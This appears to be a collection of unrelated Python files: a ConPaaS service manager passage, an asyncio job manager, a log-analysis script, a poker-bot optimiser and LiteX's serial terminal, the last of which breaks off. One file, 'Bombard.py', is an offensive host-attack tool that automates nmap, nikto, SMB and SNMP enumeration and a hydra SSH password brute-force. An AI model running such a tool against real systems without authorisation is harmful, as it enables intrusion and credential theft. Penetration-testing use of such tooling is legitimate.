def _start_backend(self, config, nodes):
for serviceNode in nodes:
try:
client.createTomcat(serviceNode.ip, 5555, config.backend_config.port)
except client.AgentException:
self.logger.exception('Failed to start Tomcat at node %s' % str(serviceNode))
self._state_set(self.S_ERROR, msg='Failed to start Tomcat at node %s' % str(serviceNode))
raise
def _stop_backend(self, config, nodes):
for serviceNode in nodes:
try: client.stopTomcat(serviceNode.ip, 5555)
except client.AgentException:
self.logger.exception('Failed to stop Tomcat at node %s' % str(serviceNode))
self._state_set(self.S_ERROR, msg='Failed to stop Tomcat at node %s' % str(serviceNode))
raise
@expose('GET')
def get_service_info(self, kwargs):
if len(kwargs) != 0:
return HttpErrorResponse(ManagerException(ManagerException.E_ARGS_UNEXPECTED, kwargs.keys()).message)
return HttpJsonResponse({'state': self._state_get(), 'type': 'JAVA'})
@expose('GET')
def get_configuration(self, kwargs):
if len(kwargs) != 0:
return HttpErrorResponse(ManagerException(ManagerException.E_ARGS_UNEXPECTED, kwargs.keys()).message)
config = self._configuration_get()
return HttpJsonResponse({'codeVersionId': config.currentCodeVersion})
@expose('POST')
def update_java_configuration(self, kwargs):
if 'codeVersionId' not in kwargs:
return HttpErrorResponse(ManagerException(ManagerException.E_ARGS_MISSING, 'at least one of "codeVersionId"').message)
codeVersionId = kwargs.pop('codeVersionId')
config = self._configuration_get()
if len(kwargs) != 0:
return HttpErrorResponse(ManagerException(ManagerException.E_ARGS_UNEXPECTED, kwargs.keys()).message)
dstate = self._state_get()
if dstate == self.S_INIT or dstate == self.S_STOPPED:
if codeVersionId: config.currentCodeVersion = codeVersionId
self._configuration_set(config)
elif dstate == self.S_RUNNING:
self._state_set(self.S_ADAPTING, msg='Updating configuration')
Thread(target=self.do_update_configuration, args=[config, codeVersionId]).start()
else:
return HttpErrorResponse(ManagerException(ManagerException.E_STATE_ERROR).message)
return HttpJsonResponse()
def _get_servlet_urls_from_webxml(self, webxml_filename):
ret = []
doc = minidom.parse(webxml_filename)
mappers = doc.getElementsByTagName('servlet-mapping')
for m in mappers:
url = m.getElementsByTagName('url-pattern')[0].firstChild.wholeText
ret.append(url)
return ret
def _get_servlet_urls(self, codeVersionId):
ret = []
archname = os.path.join(self.code_repo, codeVersionId)
if os.path.isfile(archname):
# File-based code upload
arch = archive_open(archname)
filelist = archive_get_members(arch)
if 'WEB-INF/web.xml' in filelist:
tmp_dir = mkdtemp()
arch.extract('WEB-INF/web.xml', path=tmp_dir)
ret = self._get_servlet_urls_from_webxml(os.path.join(tmp_dir, 'WEB-INF', 'web.xml'))
rmtree(tmp_dir, ignore_errors=True)
return ret
# git-based code upload
webxml_filename = os.path.join(archname, 'WEB-INF', 'web.xml')
if os.path.isfile(webxml_filename):
ret = self._get_servlet_urls_from_webxml(webxml_filename)
return ret
def do_update_configuration(self, config, codeVersionId):
if codeVersionId != None:
config.prevCodeVersion = config.currentCodeVersion
config.currentCodeVersion = codeVersionId
self._update_code(config, config.serviceNodes.values())
self._update_web(config, config.getWebServiceNodes())
self._update_proxy(config, config.getProxyServiceNodes())
self._state_set(self.S_RUNNING)
self._configuration_set(config)
def _create_initial_configuration(self):
config = JavaServiceConfiguration()
config.backend_count = 0
config.web_count = 0
config.proxy_count = 1
if not os.path.exists(self.code_repo):
os.makedirs(self.code_repo)
fileno, path = tempfile.mkstemp()
fd = os.fdopen(fileno, 'w')
fd.write('''<html>
<head>
<title>Welcome to ConPaaS!</title>
</head>
<body bgcolor="white" text="black">
<center><h1>Welcome to ConPaaS!</h1></center>
</body>
</html>''')
fd.close()
os.chmod(path, stat.S_IRWXU | stat.S_IROTH | stat.S_IXOTH)
if len(config.codeVersions) > 0: return
zfile = zipfile.ZipFile(os.path.join(self.code_repo,'code-default'), mode='w')
zfile.write(path, 'index.html')
zfile.close()
os.remove(path)
config.codeVersions['code-default'] = CodeVersion('code-default', 'code-default.war', 'zip', description='Initial version')
config.currentCodeVersion = 'code-default'
self._configuration_set(config)
self._state_set(self.S_INIT)
|
__init__.py | import asyncio
import sys
import traceback
from asyncio import CancelledError, Event, Semaphore
from asyncio.events import AbstractEventLoop
from collections import defaultdict
from threading import Thread
from typing import Coroutine, Dict
from uuid import uuid4
from ...logging import UltestLogger
class JobManager:
def __init__(self, logger: UltestLogger, num_threads: int = 2):
self._logger = logger
self._jobs: defaultdict[str, Dict[str, Event]] = defaultdict(dict)
self._loop = asyncio.new_event_loop()
self._thread = Thread(target=self._loop.run_forever, daemon=True)
self._sem = Semaphore(num_threads, loop=self._loop)
self._thread.start()
if sys.version_info < (3, 8):
# Use the new default watcher from >= 3.8, implemented locally
# https://bugs.python.org/issue35621
from .watcher import ThreadedChildWatcher
self._logger.info("Using local threaded child watcher")
asyncio.set_child_watcher(ThreadedChildWatcher())
@property
def semaphore(self) -> Semaphore:
return self._sem
def run(self, cor: Coroutine, job_group: str):
job_id = str(uuid4())
cancel_event = Event(loop=self._loop)
wrapped_cor = self._handle_coroutine(
cor, job_group=job_group, job_id=job_id, cancel_event=cancel_event
)
asyncio.run_coroutine_threadsafe(wrapped_cor, loop=self._loop)
self._jobs[job_group][job_id] = cancel_event
def stop_jobs(self, group: str):
self._logger.fdebug("Stopping jobs in group {group}")
for cancel_event in self._jobs[group].values():
self._loop.call_soon_threadsafe(cancel_event.set)
async def _handle_coroutine(
self, cor: Coroutine, job_group: str, job_id: str, cancel_event: Event
):
try:
self._logger.fdebug("Starting job with group {job_group}")
run_task = asyncio.create_task(cor)
cancel_task = asyncio.create_task(cancel_event.wait())
try:
done, _ = await asyncio.wait(
[run_task, cancel_task],
return_when=asyncio.FIRST_COMPLETED,
)
except CancelledError:
self._logger.exception(f"Task was cancelled prematurely {run_task}")
else:
if run_task in done:
e = run_task.exception()
if e:
self._logger.warn(f"Exception throw in job: {e}")
self._logger.warn(
"\n".join(
traceback.format_exception(type(e), e, e.__traceback__)
)
)
self._logger.fdebug("Finished job with group {job_group}")
else:
run_task.cancel()
self._logger.fdebug("Cancelled running job with group {job_group}")
except CancelledError:
self._logger.exception("Job runner cancelled")
raise
except Exception:
self._logger.exception("Error running job")
finally:
self._jobs[job_group].pop(job_id)
|
log_analysis.py | #!/usr/bin/env python
#coding:utf-8
import commands
import threading
import sys
import json
commands.getoutput("for i in `awk '{acc[$1]++}END{for (i in acc) {print acc[i], i}}' bitbidaccess.log|sort -nr|head -50|cut -d ' ' -f 2` ; do sed -i /$i/d bitbidaccess.log; done")
patter="cat bitbidaccess.log |egrep 'HTTP/1.1\" 200|HTTP/1.1\" 301|HTTP/1.1\" 302'|grep -iEv 'author|asp|js|php|admin|shtml|slurp|211.103.255.87|HEAD|spider|bot|getTZ|roleid'|grep -icE "
subpatter="cat bitbidaccess.log |egrep 'HTTP/1.1\" 200|HTTP/1.1\" 301|HTTP/1.1\" 302'|grep -iEv 'author|asp|js|php|admin|shtml|211.103.255.87|slurp|robot|HEAD|spider|bot|getTZ|roleid'|grep -i newsweb |grep -icE "
datalist = []
def log(x,y):
d=commands.getoutput(patter+'"'+str(x)+'"')
#print y,d
datadic={}
datadic['name']=y
datadic['value']=int(d)
datalist.append(datadic)
def log1(x,y):
d=commands.getoutput(subpatter+'"'+str(x)+'"')
#print y,d
datadic={}
datadic['name']=y
datadic['value']=int(d)
datalist.append(datadic)
threads = []
a=[('.','总计'),('/home/index.html',u'首页'),('GET / HTTP/1.1','主页'),('ggweb',u'招标公告'),('login',u'我的空间'),('aboutus',u'关于平台'),('memberinfo',u'会员须知'),('search',u'主页搜索框')]
b=[('type.401',u'项目库' ),('type.3002',u'政策法规'),('type.3001001',u'标准文件库'),('type.3001',u'下载中心'),
('type.101',u'新闻资讯'),('type.501',u'曝光台'),('type.201',u'行业动态'),('type.301',u'应用软件')]
for i in range(len(a)):
t = threading.Thread(target=log,args=a[i])
threads.append(t)
for i in range(len(b)):
t = threading.Thread(target=log1,args=b[i])
threads.append(t)
for t in threads:
t.start()
t.join()
#print datadic
f=open('web.json','w+')
print >> f,json.dumps(datalist)
f.close()
commands.getoutput("sudo cp web.json /var/www/html/")
|
Bombard.py | #!/usr/bin/python
import argparse, time, sys, os
import subprocess, multiprocessing
class Bombard(object):
def __init__(self):
self.banner()
self.parseArgs()
self.paramStrings=['1.3.6.1.2.1.25.1.6.0', '1.3.6.1.2.1.25.4.2.1.2', '1.3.6.1.2.1.25.4.2.1.4', '1.3.6.1.2.1.25.2.3.1.4', '1.3.6.1.2.1.25.6.3.1.2', '1.3.6.1.4.1.77.1.2.25', '1.3.6.1.2.1.6.13.1.3']
self.communityList="community.txt"
self.userList='userList.txt'
self.passList='passList.txt'
self.bombardHosts()
def parseArgs(self):
parser = argparse.ArgumentParser(prog='Analyzes a group of hosts and enumerates interesting info', add_help=True)
parser.add_argument('hostfile', help='host range to scan')
args = parser.parse_args()
self.hosts=self.analyzeHostfile(args.hostfile)
def bombardHosts(self):
for h in self.hosts:
protocol=h[2]
if protocol =="http" or protocol =="https":
self.addProcess(self.webEnum,[h[0],h[1],h[2]])
elif protocol == "snmp":
self.addProcess(self.snmpEnum,[h[0],h[1],h[2]])
elif protocol == "ssh":
self.addProcess(self.sshBrute,[h[0],h[1],h[2]])
elif protocol == "smb":
self.addProcess(self.smbEnum,[h[0],h[1],h[2]])
else:
print "INFO: No module found for {}. Ignored {}:{}".format(protocol,h[0],h[1])
def addProcess(self, method, arguments):
p = multiprocessing.Process(target=method, args=(arguments,))
p.start()
def webEnum(self, args):
print "INFO: Performing nmap http script scan for {}:{}".format(args[0],args[1])
nmapSCAN = "nmap -sV -Pn -vv -p {} --script='(http* or ssl*) and not (dos or fuzzer or brute)' -oN {}_http.nmap {}".format(args[1],args[0],args[0])
subprocess.check_output(nmapSCAN, shell=True)
print "INFO: Performing nikto scan on {}:{}".format(args[0],args[1])
script="nikto -host {} -port {} -C all >> {}_nikto_{}.txt".format(args[0],args[1],args[0],args[1])
subprocess.check_output(script, shell=True)
'''
print "INFO: Performing dirb scan on {}:{}".format(args[0],args[1])
dirbList="/usr/share/wordlists/dirbuster/directory-list-2.3-small.txt"
script="dirb {}://{}:{} {} -S -w >> {}_dirb_{}.txt".format(args[2],args[0],args[1],dirbList,args[0],args[1])
subprocess.call(script, shell=True)
'''
print "INFO: Finished http module for {}:{}".format(args[0],args[1])
def smbEnum(self, args):
print "INFO: Performing nmap smb script scan for {}:{}".format(args[0],args[1])
nmapSCAN = "nmap -sV -Pn -vv -p {} --script='(smb*) and not (brute or broadcast or dos or external or fuzzer)' --script-args=unsafe=1 -oN {}_smb.nmap {}".format(args[1],args[0],args[0])
subprocess.check_output(nmapSCAN, shell=True)
print "INFO: Performing ntbscan for {}:{}".format(args[0],args[1])
nbtSCAN = "nbtscan -r -v -h {} >> {}_smbNbt.txt".format(args[0],args[0])
subprocess.check_output(nbtSCAN, shell=True)
print "INFO: Performing enum4Linux scan for {}:{}".format(args[0],args[1])
try:
enumSCAN = "enum4linux -a -M -v {} >> {}_smbEnum.txt".format(args[0],args[0])
subprocess.check_output(enumSCAN, shell=True)
except:
print "ERROR: enum4Linux scan FAILED for {}:{}".format(args[0],args[1])
print "INFO: Finished smb module for {}:{}".format(args[0],args[1])
def snmpEnum(self, args):
print "INFO: Performing nmap snmp script scan for {}:{}".format(args[0],args[1])
nmapSCAN = "nmap -sV -Pn -vv -p {} --script=snmp* -oN {}_snmp.nmap {}".format(args[1],args[0],args[0])
subprocess.check_output(nmapSCAN, shell=True)
print "INFO: Performing OneSixtyOne snmp scan for {}:{}".format(args[0],args[1])
oneSixtyOneSCAN="onesixtyone -c {} {} >> {}_161snmp.txt".format(self.communityList, args[0],args[0])
subprocess.check_output(oneSixtyOneSCAN, shell=True)
print "INFO: Performing snmpwalk scan for {}:{}".format(args[0],args[1])
for param in self.paramStrings:
try:
snmpWalkSCAN="snmpwalk -c public -v1 {} {} >> {}_snmpwalk.txt;".format(args[0], param, args[0])
subprocess.check_output(snmpWalkSCAN, shell=True)
except:
pass
print "INFO: Performing snmpcheck scan for {}:{}".format(args[0],args[1])
try:
snmpCheckSCAN="snmpcheck -t {} >> {}_snmpcheck.txt;" % (args[0],args[0])
subprocess.check_output(snmpCheckSCAN, shell=True)
except:
pass
print "INFO: Finished snmp module for {}:{}".format(args[0],args[1])
def sshBrute(self, args):
print "INFO: Performing hydra ssh bruteforce against {}:{}".format(args[0],args[1])
hydraCmd = "hydra -u -t 4 -L {} -P {} -f -s {} -o {}_sshhydra.txt {} ssh".format(self.userList, self.passList, args[1], args[0], args[0])
try:
results = subprocess.check_output(hydraCmd, shell=True)
resultarr = results.split("\n")
for result in resultarr:
if "login:" in result:
print "[*] Valid ssh credentials found: " + result
except:
print "INFO: No valid ssh credentials found"
print "INFO: Finished ssh module for {}:{}".format(args[0],args[1])
def analyzeHostfile(self, hostfile):
try:
with open(hostfile) as f:
allHosts=[]
for line in f:
if line[0]=='#':
pass
else:
if len(line.split())==3:
# Host Port Protocol
allHosts.append(line.split())
else:
raise
return allHosts
except:
print "Invalid host file formatting!"
sys.exit()
def banner(self):
print "############################################################"
print "#### Bombard ####"
print "#### Asynchronous Host Attack ####"
print "############################################################"
if __name__ == "__main__":
bombard = Bombard() |
optimiser.py | from typing import List
from random import random
from dealer.main import run_game_for_n_players
from player.base_player import PokerPlayer
from player.basic_heuristic_player import high_card_player
from player.basic_heuristic_player import partial_score_player
from player.random_player import random_player
from threading import Thread
player_num = 3
rand_player_num = 1
base_value = (0.3, 0.6)
delta = 0.4
def main():
best_value = base_value
log = []
for _ in range(10):
inputs = get_new_inputs(best_value)
results = run_some_games(inputs)
winner = max(enumerate(results), key=lambda x: x[1])[0]
if winner >= player_num:
print("random won")
else:
best_value = inputs[winner]
log.append((inputs, results, winner, best_value))
for l in log:
print(l)
def get_new_inputs(best_value):
inputs = []
for _ in range(player_num):
fold_threshold, call_threshold = best_value
fold_threshold = max(fold_threshold + random() * delta - (delta / 2), 0)
call_threshold = max(call_threshold + random() * delta - (delta / 2), 0)
inputs.append((fold_threshold, call_threshold))
return inputs
def run_some_games(inputs):
results = [0] * (player_num + rand_player_num)
for _ in range(20):
run_game(inputs, results)
print(".", end="")
print(results)
return results
def run_game(inputs, results):
server_thread = start_server()
players: List[PokerPlayer] = [partial_score_player(False, fold, call) for (fold, call) in inputs] \
+ [random_player(False) for _ in range(rand_player_num)]
threads = []
for i, player in enumerate(players):
player.coms.verbose = False
threads.append(start_player(player, results, i))
server_thread.join()
for thread in threads:
thread.join()
def start_server():
t = Thread(target=run_game_for_n_players, args=(player_num + rand_player_num,), kwargs={"verbose": False})
t.start()
return t
def start_player(p: PokerPlayer, results, i):
def func():
if p.play():
results[i] += 1
t = Thread(target=func)
t.start()
return t
if __name__ == "__main__":
main()
|
litex_term.py | #!/usr/bin/env python3
#
# This file is part of LiteX.
#
# Copyright (c) 2015-2020 Florent Kermarrec <florent@enjoy-digital.fr>
# Copyright (c) 2015 Sebastien Bourdeauducq <sb@m-labs.hk>
# Copyright (c) 2016 whitequark <whitequark@whitequark.org>
# SPDX-License-Identifier: BSD-2-Clause
import sys
import signal
import os
import time
import serial
import threading
import multiprocessing
import argparse
import json
import socket
# Console ------------------------------------------------------------------------------------------
if sys.platform == "win32":
import ctypes
import msvcrt
class Console:
def configure(self):
# https://stackoverflow.com/a/36760881
# ENABLE_VIRTUAL_TERMINAL_PROCESSING
kernel32 = ctypes.windll.kernel32
kernel32.SetConsoleMode(kernel32.GetStdHandle(-11), 7)
def unconfigure(self):
pass
def getkey(self):
return msvcrt.getch()
# getch doesn't return Virtual Keycodes, but rather
# PS/2 Scan Codes. Keycodes starting with 0xE0 are
# worth handling.
def escape_char(self, b):
return b == b"\xe0"
def handle_escape(self, b):
return {
b"H" : b"\x1b[A", # Up
b"P" : b"\x1b[B", # Down
b"K" : b"\x1b[D", # Left
b"M" : b"\x1b[C", # Right
b"G" : b"\x1b[H", # Home
b"O" : b"\x1b[F", # End
b"R" : b"\x1b[2~", # Insert
b"S" : b"\x1b[3~", # Delete
}.get(b, None) # TODO: Handle ESC? Others?
else:
import termios
import pty
class Console:
def __init__(self):
self.fd = sys.stdin.fileno()
self.default_settings = termios.tcgetattr(self.fd)
def configure(self):
settings = termios.tcgetattr(self.fd)
settings[3] = settings[3] & ~termios.ICANON & ~termios.ECHO
settings[6][termios.VMIN] = 1
settings[6][termios.VTIME] = 0
termios.tcsetattr(self.fd, termios.TCSANOW, settings)
def unconfigure(self):
termios.tcsetattr(self.fd, termios.TCSAFLUSH, self.default_settings)
def getkey(self):
return os.read(self.fd, 1)
def escape_char(self, b):
return False
def handle_escape(self, b):
return None
# Bridge UART -------------------------------------------------------------------------------------
from litex import RemoteClient
class BridgeUART:
def __init__(self, name="uart_xover", host="localhost", base_address=0): # FIXME: add command line arguments
self.bus = RemoteClient(host=host, base_address=base_address)
present = False
for k, v in self.bus.regs.d.items():
if f"{name}_" in k:
setattr(self, k.replace(f"{name}_", ""), v)
present = True
if not present:
raise ValueError(f"CrossoverUART {name} not present in design.")
def open(self):
self.bus.open()
self.file, self.name = pty.openpty()
self.pty2crossover_thread = multiprocessing.Process(target=self.pty2crossover)
self.crossover2pty_thread = multiprocessing.Process(target=self.crossover2pty)
self.pty2crossover_thread.start()
self.crossover2pty_thread.start()
def close(self):
self.bus.close()
self.pty2crossover_thread.terminate()
self.crossover2pty_thread.terminate()
def pty2crossover(self):
while True:
r = os.read(self.file, 1)
self.rxtx.write(ord(r))
def crossover2pty(self):
while True:
if self.rxfull.read():
length = 16
elif not self.rxempty.read():
length = 1
else:
time.sleep(1e-3)
continue
r = self.bus.read(self.rxtx.addr, length=length, burst="fixed")
for v in r:
os.write(self.file, bytes(chr(v).encode("utf-8")))
# JTAG UART ----------------------------------------------------------------------------------------
from litex.build.openocd import OpenOCD
class JTAGUART:
def __init__(self, config="openocd_xc7_ft2232.cfg", port=20000, chain=1):
self.config = config
self.port = port
self.chain = chain
def open(self):
self.file, self.name = pty.openpty()
self.jtag2tcp_thread = multiprocessing.Process(target=self.jtag2tcp)
self.jtag2tcp_thread.start()
time.sleep(0.5)
self.pty2tcp_thread = multiprocessing.Process(target=self.pty2tcp)
self.tcp2pty_thread = multiprocessing.Process(target=self.tcp2pty)
self.tcp = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.tcp.connect(("localhost", self.port))
self.pty2tcp_thread.start()
self.tcp2pty_thread.start()
def close(self):
self.jtag2tcp_thread.terminate()
self.pty2tcp_thread.terminate()
self.tcp2pty_thread.terminate()
def jtag2tcp(self):
prog = OpenOCD(self.config)
prog.stream(self.port, self.chain)
def pty2tcp(self):
while True:
r = os.read(self.file, 1)
self.tcp.send(r)
def tcp2pty(self):
while True:
r = self.tcp.recv(1)
os.write(self.file, bytes(r))
# Intel/Altera JTAG UART via nios2-terminal
class Nios2Terminal():
def __init__(self):
from subprocess import Popen, PIPE
p = Popen("nios2-terminal", stdin=PIPE, stdout=PIPE)
self.p = p
def read(self):
return self.p.stdout.read(1)
def in_waiting(self):
# unfortunately p.stdout does not provide
# information about awaiting input
return False
def write(self, data):
if data is not None:
self.p.stdin.write(data)
try:
self.p.stdin.flush()
except BrokenPipeError:
print("nios2-terminal has terminated, exiting...\n")
sys.exit(1)
def close(self):
self.p.terminate()
# SFL ----------------------------------------------------------------------------------------------
sfl_prompt_req = b"F7: boot from serial\n"
sfl_prompt_ack = b"\x06"
sfl_magic_req = b"sL5DdSMmkekro\n"
sfl_magic_ack = b"z6IHG7cYDID6o\n"
sfl_payload_length = 255
sfl_outstanding = 128
# General commands
sfl_cmd_abort = b"\x00"
sfl_cmd_load = b"\x01"
sfl_cmd_jump = b"\x02"
# Replies
sfl_ack_success = b"K"
sfl_ack_crcerror = b"C"
sfl_ack_unknown = b"U"
sfl_ack_error = b"E"
class SFLFrame:
def __init__(self):
self.cmd = bytes()
self.payload = bytes()
def compute_crc(self):
return crc16(self.cmd + self.payload)
def encode(self):
packet = bytes([len(self.payload)])
packet += self.compute_crc().to_bytes(2, "big")
packet += self.cmd
packet += self.payload
return packet
# CRC16 --------------------------------------------------------------------------------------------
crc16_table = [
0x0000, 0x1021, 0x2042, 0x3063, 0x4084, 0x50A5, 0x60C6, 0x70E7,
0x8108, 0x9129, 0xA14A, 0xB16B, 0xC18C, 0xD1AD, 0xE1CE, 0xF1EF,
0x1231, 0x0210, 0x3273, 0x2252, 0x52B5, 0x4294, 0x72F7, 0x62D6,
0x9339, 0x8318, 0xB37B, 0xA35A, 0xD3BD, 0xC39C, 0xF3FF, 0xE3DE,
0x2462, 0x3443, 0x0420, 0x1401, 0x64E6, 0x74C7, 0x44A4, 0x5485,
0xA56A, 0xB54B, 0x8528, 0x9509, 0xE5EE, 0xF5CF, 0xC5AC, 0xD58D,
0x3653, 0x2672, 0x1611, 0x0630, 0x76D7, 0x66F6, 0x5695, 0x46B4,
0xB75B, 0xA77A, 0x9719, 0x8738, 0xF7DF, 0xE7FE, 0xD79D, 0xC7BC,
0x48C4, 0x58E5, 0x6886, 0x78A7, 0x0840, 0x1861, 0x2802, 0x3823,
0xC9CC, 0xD9ED, 0xE98E, 0xF9AF, 0x8948, 0x9969, 0xA90A, 0xB92B,
0x5AF5, 0x4AD4, 0x7AB7, 0x6A96, 0x1A71, 0x0A50, 0x3A33, 0x2A12,
0xDBFD, 0xCBDC, 0xFBBF, 0xEB9E, 0x9B79, 0x8B58, 0xBB3B, 0xAB1A,
0x6CA6, 0x7C87, 0x4CE4, 0x5CC5, 0x2C22, 0x3C03, 0x0C60, 0x1C41,
0xEDAE, 0xFD8F, 0xCDEC, 0xDDCD, 0xAD2A, 0xBD0B, 0x8D68, 0x9D49,
0x7E97, 0x6EB6, 0x5ED5, 0x4EF4, 0x3E13, 0x2E32, 0x1E51, 0x0E70,
0xFF9F, 0xEFBE, 0xDFDD, 0xCFFC, 0xBF1B, 0xAF3A, 0x9F59, 0x8F78,
0x9188, 0x81A9, 0xB1CA, 0xA1EB, 0xD10C, 0xC12D, 0xF14E, 0xE16F,
0x1080, 0x00A1, 0x30C2, 0x20E3, 0x5004, 0x4025, 0x7046, 0x6067,
0x83B9, 0x9398, 0xA3FB, 0xB3DA, 0xC33D, 0xD31C, 0xE37F, 0xF35E,
0x02B1, 0x1290, 0x22F3, 0x32D2, 0x4235, 0x5214, 0x6277, 0x7256,
0xB5EA, 0xA5CB, 0x95A8, 0x8589, 0xF56E, 0xE54F, 0xD52C, 0xC50D,
0x34E2, 0x24C3, 0x14A0, 0x0481, 0x7466, 0x6447, 0x5424, 0x4405,
0xA7DB, 0xB7FA, 0x8799, 0x97B8, 0xE75F, 0xF77E, 0xC71D, 0xD73C,
0x26D3, 0x36F2, 0x0691, 0x16B0, 0x6657, 0x7676, 0x4615, 0x5634,
0xD94C, 0xC96D, 0xF90E, 0xE92F, 0x99C8, 0x89E9, 0xB98A, 0xA9AB,
0x5844, 0x4865, 0x7806, 0x6827, 0x18C0, 0x08E1, 0x3882, 0x28A3,
0xCB7D, 0xDB5C, 0xEB3F, 0xFB1E, 0x8BF9, 0x9BD8, 0xABBB, 0xBB9A,
0x4A75, 0x5A54, 0x6A37, 0x7A16, 0x0AF1, 0x1AD0, 0x2AB3, 0x3A92,
0xFD2E, 0xED0F, 0xDD6C, 0xCD4D, 0xBDAA, 0xAD8B, 0x9DE8, 0x8DC9,
0x7C26, 0x6C07, 0x5C64, 0x4C45, 0x3CA2, 0x2C83, 0x1CE0, 0x0CC1,
0xEF1F, 0xFF3E, 0xCF5D, 0xDF7C, 0xAF9B, 0xBFBA, 0x8FD9, 0x9FF8,
0x6E17, 0x7E36, 0x4E55, 0x5E74, 0x2E93, 0x3EB2, 0x0ED1, 0x1EF0
]
def crc16(l):
crc = 0
for d in l:
crc = crc16_table[((crc >> 8) ^ d) & 0xff] ^ (crc << 8)
return crc & 0xffff
# LiteXTerm ----------------------------------------------------------------------------------------
class LiteXTerm:
def __init__(self, serial_boot, kernel_image, kernel_address, json_images):
self.serial_boot = serial_boot
assert not (kernel_image is not None and json_images is not None)
self.mem_regions = {}
if kernel_image is not None:
self.mem_regions = {kernel_image: kernel_address}
self.boot_address = kernel_address
if json_images is not None:
f = open(json_images, "r")
json_dir = os.path.dirname(json_images)
for k, v in json.load(f).items():
self.mem_regions[os.path.join(json_dir, k)] = v
self.boot_address = self.mem_regions[list(self.mem_regions.keys())[-1]]
f.close()
self.reader_alive = False
self.writer_alive = False
self.prompt_detect_buffer = bytes(len(sfl_prompt_req))
self.magic_detect_buffer = bytes(len(sfl_magic_req))
self.console = Console()
signal.signal(signal.SIGINT, self.sigint)
self.sigint_time_last = 0
def open(self, port, baudrate):
if hasattr(self, "port"):
return
# FIXME: https://github.com/enjoy-digital/litex/issues/720
if "ttyACM" in port:
self.payload_length = sfl_payload_length
self.delay = 1e-4
elif "tty.usbmodem" in port:
self.payload_length = sfl_payload_length
self.delay = 1e-3
else:
self.payload_length = 64
self.delay = 1e-5
self.port = serial.serial_for_url(port, baudrate)
def close(self):
if not hasattr(self, "port"):
return
self.port.close()
del self.port
def sigint(self, sig, frame):
if hasattr(self, "port"):
self.port.write(b"\x03")
sigint_time_current = time.time()
# Exit term if 2 CTRL-C pressed in less than 0.5s.
if (sigint_time_current - self.sigint_time_last < 0.5):
self.console.unconfigure()
self.close()
sys.exit()
else:
self.sigint_time_last = sigint_time_current
def send_frame(self, frame):
retry = 1
while retry:
self.port.write(frame.encode())
# Get the reply from the device
reply = self.port.read()
if reply == sfl_ack_success:
retry = 0
elif reply == sfl_ack_crcerror:
retry = 1
else:
print("[LXTERM] Got unknown reply '{}' from the device, aborting.".format(reply))
return 0
return 1
def receive_upload_response(self):
reply = self.port.read()
if reply == sfl_ack_success:
return True
elif reply == sfl_ack_crcerror:
print("[LXTERM] Upload to device failed due to data corruption (CRC error)")
else:
print(f"[LXTERM] Got unexpected response from device '{reply}'")
sys.exit(1)
def upload(self, filename, address):
f = open(filename, "rb")
f.seek(0, 2)
length = f.tell()
f.seek(0, 0)
print(f"[LXTERM] Uploading {filename} to 0x{address:08x} ({length} bytes)...")
# Prepare parameters
current_address = address
position = 0
start = time.time()
remaining = length
outstanding = 0
while remaining:
# Show progress
sys.stdout.write("|{}>{}| {}%\r".format(
"=" * (20*position//length),
" " * (20-20*position//length),
100*position//length))
sys.stdout.flush()
# Send frame if max outstanding not reached.
if outstanding <= sfl_outstanding:
# Prepare frame.
frame = SFLFrame()
frame.cmd = sfl_cmd_load
frame_data = f.read(min(remaining, self.payload_length-4))
frame.payload = current_address.to_bytes(4, "big")
frame.payload += frame_data
# Encode frame and send it.
self.port.write(frame.encode())
# Update parameters
current_address += len(frame_data)
position += len(frame_data)
remaining -= len(frame_data)
outstanding += 1
# Inter-frame delay.
time.sleep(self.delay)
# Read response if available.
while self.port.in_waiting:
ack = self.receive_upload_response()
if ack:
outstanding -= 1
break
# Get remaining responses.
for _ in range(outstanding):
self.receive_upload_response()
# Compute speed.
end = time.time()
elapsed = end - start
print("[LXTERM] Upload complete ({0:.1f}KB/s).".format(length/(elapsed*1024)))
f.close()
return length
def boot(self):
print("[LXTERM] Booting the device.")
frame = SFLFrame()
frame.cmd = sfl_cmd_jump
frame.payload = int(self.boot_address, 16).to_bytes(4, "big")
self.send_frame(frame)
def detect_prompt(self, data):
if len(data):
self.prompt_detect_buffer = self.prompt_detect_buffer[1:] + data
return self.prompt_detect_buffer == sfl_prompt_req
else:
return False
def answer_prompt(self):
print("[LXTERM] Received serial boot prompt from the device.")
self.port.write(sfl_prompt_ack)
def detect_magic(self, data):
if len(data):
self.magic_detect_buffer = self.magic_detect_buffer[1:] + data
return self.magic_detect_buffer == sfl_magic_req
else:
return False
def answer_magic(self):
print("[LXTERM] Received firmware download request from the device.")
if(len(self.mem_regions)):
self.port.write(sfl_magic_ack)
for filename, base in self.mem_regions.items():
self.upload(filename, int(base, 16))
self.boot()
print("[LXTERM] Done.")
def reader(self):
try:
while self.reader_alive:
c = self.port.read()
sys.stdout.buffer.write(c)
sys.stdout.flush()
if len(self.mem_regions):
if self.serial_boot and self.detect_prompt(c):
self.answer_prompt()
if self.detect_magic(c):
self.answer_magic()
except serial.SerialException:
self.reader_alive = False
self.console.unconfigure()
raise
def start_reader(self):
self.reader_alive = True
self.reader_thread = threading.Thread(target=self.reader)
self.reader_thread.setDaemon(True)
self.reader_thread.start()
def stop_reader(self):
self.reader_alive = False
self.reader_thread.join()
def writer(self):
try:
while self.writer_alive:
b = self.console.getkey()
if b == b"\x03":
self.stop()
elif b == b"\n":
self.port.write(b"\x0a")
elif self.console.escape_char(b):
b = self.console.getkey()
ansi_seq = self.console.handle_escape(b)
self.port.write(ansi_seq)
else:
self.port.write(b)
except:
self.writer_alive = False
self.console.unconfigure()
raise
def start_writer(self):
self.writer_alive = True
self.writer_thread = threading.Thread(target=self.writer)
self.writer_thread.setDaemon(True)
self.writer_thread.start()
def stop_writer(self):
self.writer_alive = False
self.writer_thread.join()
def start(self):
self.start_reader()
self.start_writer()
def stop(self):
self.reader_alive = False
self.writer_alive = False
def join(self, writer_only=False):
self.writer_thread.join()
if not writer_only:
self.reader_thread.join()
# Run ----------------------------------------------------------------------------------------------
def _get_args():
parser = argparse.ArgumentParser()
parser.add_argument("port", help="Serial port (eg /dev/tty*, bridge, jtag)")
parser.add_argument("--speed", default=115200, help="Serial baudrate")
parser.add_argument("--serial-boot", default=False, action='store_true', help="Automatically initiate serial boot")
parser.add_argument("--kernel", default=None, help="Kernel image")
parser.add_argument("--kernel-adr", default="0x40000000", help="Kernel address")
parser.add_argument("--images", default=None, help="JSON description of the images to load to memory")
parser.add_argument("--bridge-name", default="uart_xover", help="Bridge UART name to use (present in design/csr.csv)")
